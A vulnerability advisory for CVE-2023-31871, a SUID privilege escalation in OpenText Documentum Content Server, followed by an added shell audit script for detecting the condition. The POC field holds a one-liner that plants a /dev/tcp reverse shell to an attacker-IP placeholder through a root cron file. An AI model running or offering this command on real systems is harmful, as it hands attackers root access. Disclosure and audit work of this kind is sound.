CVE-2023-31871: OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

OpenText Documentum Content Server before 23.2 has a flaw that allows for privilege escalation from a non-privileged Documentum user to root. The software comes prepackaged with a root owned SUID binary dm_secure_writer. The binary has security controls in place preventing creation of a file in a non-owned directory, or as the root user. However, these controls can be carefully bypassed to allow for an arbitrary file write as root.


OpenText Documentum Content Server < 23.2 SUID Local Privilege Escalation

[Suggested description]

OpenText Documentum Content Server before 23.2 has a flaw that allows for privilege escalation from a non-privileged Documentum user to root. The software comes prepackaged with a root owned SUID binary dm_secure_writer. The binary has security controls in place preventing creation of a file in a non-owned directory, or as the root user. However, these controls can be carefully bypassed to allow for an arbitrary file write as root.

------------------------------------------

[Vulnerability Type]

Local Privilege Escalation via SetUID Binary

------------------------------------------

[Vendor of Product]

OpenText

------------------------------------------

[Affected Product Code Base]

Documentum Content Server - Before 23.2, Fixed in 23.2.

------------------------------------------

[Affected Component]

The affected SUID is dm_secure_writer.

------------------------------------------

[Attack Type]

Local

------------------------------------------

[Impact Code execution]

true

------------------------------------------

[Impact Escalation of Privileges]

true

------------------------------------------

[Attack Vectors]

Local access as the Documentum Content Server user to the machine with the affected software.

------------------------------------------

[Reference]

https://www.opentext.com/about/security-acknowledgements

------------------------------------------

[Has vendor confirmed or acknowledged the vulnerability?]

true

------------------------------------------

[POC]

ln -s /<Documentum Home>/dm_secure_writer /tmp/secure_writer; echo "bash -i >& /dev/tcp/<ATTACKER IP>/4444 0>&1">/tmp/test.sh; chmod +x /tmp/test.sh; echo "* * * * * root /tmp/test.sh" | /tmp/secure_writer test -1 /etc/cron.d/evilcron

------------------------------------------

[Discoverer]

@picar0jsu
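
------------------------------------------

A host audit for the condition this advisory describes, as an added example that is not part of the advisory or OpenText's code. It lists root-owned SUID copies of dm_secure_writer, symlinks that resolve to it (the PoC above invokes it through one in /tmp), and root cron entries that run commands from world-writable paths. The function names, the owner-UID parameter and the list of world-writable directories are assumptions of this sketch.

```shell
#!/bin/sh
# Added audit sketch for CVE-2023-31871; not vendor code.
BIN_NAME="dm_secure_writer"   # affected binary named in the advisory

# List regular files named $BIN_NAME under DIR that carry the setuid bit and
# are owned by OWNER_UID (assumed parameter; default 0 = root).
find_suid_writer() {
    dir=$1; owner_uid=${2:-0}
    find "$dir" -xdev -type f -name "$BIN_NAME" -uid "$owner_uid" -perm -4000 2>/dev/null
}

# List symlinks under DIR that resolve to a file named $BIN_NAME, whatever
# the link itself is called.
find_links_to_writer() {
    dir=$1
    find "$dir" -xdev -type l 2>/dev/null | while IFS= read -r link; do
        target=$(readlink -f "$link" 2>/dev/null) || continue
        if [ "$(basename "$target")" = "$BIN_NAME" ]; then
            printf '%s -> %s\n' "$link" "$target"
        fi
    done
}

# List system-crontab lines (min hour dom mon dow user command) in the files
# of DIR that run, as root, a command stored in a world-writable location.
find_root_cron_tmp() {
    dir=$1
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        awk -v f="$f" '!/^[ \t]*#/ && NF >= 7 && $6 == "root" &&
            $7 ~ /^\/(tmp|var\/tmp|dev\/shm)\// { print f ": " $0 }' "$f"
    done
}
```

On a Content Server host, source the file and run find_suid_writer against the Documentum home, find_links_to_writer against /tmp, and find_root_cron_tmp against /etc/cron.d; any hit on a release before 23.2 warrants review.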
